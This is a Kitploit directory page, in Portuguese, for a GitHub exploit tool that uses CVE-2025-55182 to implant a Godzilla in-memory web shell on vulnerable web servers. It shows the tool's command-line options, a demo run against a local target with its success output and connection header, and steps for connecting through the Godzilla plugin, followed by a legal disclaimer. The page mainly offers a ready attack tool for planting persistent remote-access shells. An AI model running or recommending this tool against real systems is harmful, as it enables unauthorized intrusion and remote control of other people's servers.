Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-GodzillaMemoryShell — Script de exploração para CVE-2025-55182 que implanta um shell de memória Godzilla em servidores web vulneráveis, com suporte para opções de proxy e codificação. | Kitploit
Ferramentas/GitHubGitHub/beichendream/cve-2025-55182-godzillamemoryshell
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubbeichendream/cve-2025-55182-godzillamemoryshell

CVE-2025-55182-GodzillaMemoryShell

Script de exploração para CVE-2025-55182 que implanta um shell de memória Godzilla em servidores web vulneráveis, com suporte para opções de proxy e codificação.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
108112há 9 mesesRevisado pelo Kitploit
Compartilhar

CVE-2025-55182-GodzillaMemoryShell

ajuda

root@kitploit:~
usage: exploit.py [-h] [--proxy PROXY] [--utf16] [--unicode] --key KEY
            --target TARGET

CVE-2025-55182 Godzilla Memoryshell

options:
  -h, --help       show this help message and exit
  --proxy PROXY    HTTP proxy address, e.g. http://127.0.0.1:8888
  --utf16          Enable UTF-16 encoding
  --unicode        Enable full unicode escape encoding
  --key KEY        Godzilla Key
  --target TARGET  Target URL for exp.exploit()

demo

root@kitploit:~
python exploit.py --key 666 --target http://127.0.0.1:3000 
This tool is only suitable for conducting security research, vulnerability detection and related compliance testing on your own systems or explicitly authorized environments within the scope of legal authorization. Any unauthorized, illegal or infringing penetration, attack or other improper use of this tool is strictly prohibited. Users must fully understand and abide by the laws and regulations of their jurisdiction before use, ensure that the purpose of use is legal and compliant, and bear full responsibility for all risks and consequences arising from use. The developer assumes no responsibility for the consequences of any unauthorized or improper use.
本工具仅适用于在合法授权范围内,对自身系统或经明确授权的环境开展安全研究、漏洞检测及相关合规测试。严禁将本工具用于任何未经授权、违法或侵权的渗透、攻击或其他不当用途。使用者须在使用前充分了解并遵守其所在辖区的法律法规,自行确保使用目的合法合规,并对使用过程中产生的全部风险及后果承担完全责任。开发方对任何未经授权或不当使用所导致的后果不承担任何责任。
 (y/n): y
[*] exploit ok!
[*] connect header
	Next-Action: cd3f0c85b158c08a2b113464991810cf2cdfc387

Antes de usar, primeiro carregue o plugin GodzillaNodeJsPayload no Godzilla. A key é a key do Godzilla. Não é necessário o parâmetro password ao conectar.

https://github.com/BeichenDream/GodzillaNodeJsPayload

Referências

https://github.com/msanft/CVE-2025-55182

Baixar ferramenta